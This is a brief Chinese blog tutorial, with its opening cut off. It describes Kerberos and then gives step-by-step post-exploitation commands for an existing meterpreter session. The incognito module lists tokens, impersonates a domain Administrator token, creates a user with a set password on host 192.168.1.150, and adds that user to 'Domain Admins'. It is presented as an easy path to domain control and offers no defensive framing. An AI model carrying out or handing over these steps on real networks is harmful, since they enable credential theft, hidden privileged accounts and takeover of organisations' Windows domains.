erberos是一种计算机网络认证协议,它允许某实体在非安全网络环境下通信,向另一个实体以一种安全的方式证明自己的身份。它也指由麻省理工实现此协议,并发布的一套免费软件。它的设计主要针对客户-服务器模型,并提供了一系列交互认证——用户和服务器都能验证对方的身份。
当成功的***了一个系统并建立了一个meterpreter的终端,域管理员登陆这台机器的时候会发送Kerberos令牌到服务器上。我们可以使用这个活动令牌来***系统,通过meterpreter可以假冒成域管理员的角色,而不需要破解它的密码然后可以去***域管理员账号甚至域控制器。
在meterpreter的终端下加载incognito模块list_tokens -u列举出令牌,看到1230TT\\Administrator域管理员账号我们可以假冒它
假冒Administrator域管理员账号
impersonate_token 1230TT\\Administrator
添加用户add_user 11 p@55w0rd! -h 192.168.1.150
把用户添加到域管理员组add_group_user “Domain Admins” 11 -h 192.168.1.150
这样很简单就可以添加了一个域管理员用户了
原文链接:http://1230tt.com/archives/250.html